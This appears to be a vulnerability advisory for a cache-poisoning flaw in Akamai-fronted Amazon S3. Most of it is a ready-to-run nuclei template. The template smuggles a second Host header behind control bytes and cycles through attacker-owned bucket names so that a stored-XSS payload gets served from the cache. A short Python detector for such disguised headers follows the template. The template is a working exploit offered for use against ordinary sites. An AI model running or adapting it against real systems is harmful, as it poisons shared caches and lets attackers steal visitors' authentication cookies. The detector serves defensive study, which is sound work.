akamai-s3-cache-poisoning: Akamai/Amazon S3 - Cache Poisoning

Date: 2025-08-01 | Affected software: Akamai Amazon S3 | PoC: Public

Vulnerability description

Akamai/Amazon S3 exposes a stored cross-site scripting vulnerability that arises from a cache poisoning capability. An attacker can inject arbitrary script into the browser of an unsuspecting user in the context of the affected site, which can in turn allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC code [public]

id: akamai-s3-cache-poisoning

info:
  name: Akamai/Amazon S3 - Cache Poisoning
  author: DhiyaneshDk
  severity: high
  description: Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
    - https://owasp.org/www-community/attacks/Cache_Poisoning
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cwe-id: CWE-44
  metadata:
    verified: true
    max-request: 204
  tags: cache,poisoning,xss,akamai,s3,misconfig,vuln
variables:
  rand: "{{rand_base(5)}}"

http:
  - raw:
      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}
        {{escape}}Host: {{bucket}}

      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}

    attack: clusterbomb
    payloads:
      escape:
        - "\v"
        - "\f"
        - "\x1c"
        - "\x1d"
        - "\x1e"
        - "\x1f"
      bucket:
        - "nuclei-ap-northeast-1"
        - "nuclei-ap-northeast-2"
        - "nuclei-ap-northeast-3"
        - "nuclei-ap-south-1"
        - "nuclei-ap-southeast-1"
        - "nuclei-ap-southeast-2"
        - "nuclei-ca-central-1"
        - "nuclei-eu-central-1"
        - "nuclei-eu-north-1"
        - "nuclei-eu-west-1"
        - "nuclei-eu-west-2"
        - "nuclei-eu-west-3"
        - "nuclei-sa-east-1"
        - "nuclei-us-east-1"
        - "nuclei-us-east-2"
        - "nuclei-us-west-1"
        - "nuclei-us-west-2"
    stop-at-first-match: true
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "alert(document.domain)")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a00473045022100aac77893e88ddd18fa4d35f6705e1c26d8bae5b910fd71e4573605d9a89128b202202c7a38d6c4a33b43f839a137c74af1f3d51616f8f18187ef6acec46b564fd3dc:922c64590222798bb761d5b6d8e72950
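
On the defensive side, the first request in the template is recognizable by a second `Host` line whose field name starts with one of the listed control bytes. The following check is an added example, not part of the template or the nuclei project; the function name `audit_request_head` and the sample hostnames are assumptions made for illustration.

```python
import re

# RFC 7230 "token" characters: the only bytes allowed in a header field name.
TOKEN = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
# Control bytes the template prefixes to its second Host line:
# \v, \f, \x1c, \x1d, \x1e, \x1f.
ESCAPES = b"\x0b\x0c\x1c\x1d\x1e\x1f"


def audit_request_head(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP/1.1 request head."""
    findings = []
    head = raw.split(b"\r\n\r\n", 1)[0]
    # Split on CRLF only. str.splitlines() would also break on
    # \v, \f and \x1c-\x1e and hide the disguised header name.
    lines = head.split(b"\r\n")[1:]  # skip the request line
    host_count = 0
    for line in lines:
        name, sep, _value = line.partition(b":")
        if not sep:
            findings.append(f"malformed header line: {line!r}")
            continue
        if TOKEN.fullmatch(name):
            if name.lower() == b"host":
                host_count += 1
            continue
        # The field name contains bytes outside the token set.
        if name.strip(ESCAPES + b" \t").lower() == b"host":
            findings.append(f"disguised Host header: {line!r}")
        else:
            findings.append(f"invalid field name: {name!r}")
    if host_count != 1:
        findings.append(f"expected exactly one Host header, saw {host_count}")
    return findings


# Constructed sample inputs (hostnames are placeholders).
CLEAN = b"GET /a.svg?x=1 HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
SMUGGLED = (b"GET /a.svg?x=1 HTTP/1.1\r\nHost: www.example.test\r\n"
            b"\x0bHost: other-bucket\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("clean", CLEAN), ("smuggled", SMUGGLED)):
        print(label, audit_request_head(req))
```

An edge proxy or origin that rejects any request with a non-empty findings list never forwards the second `Host` line to the cache or the bucket.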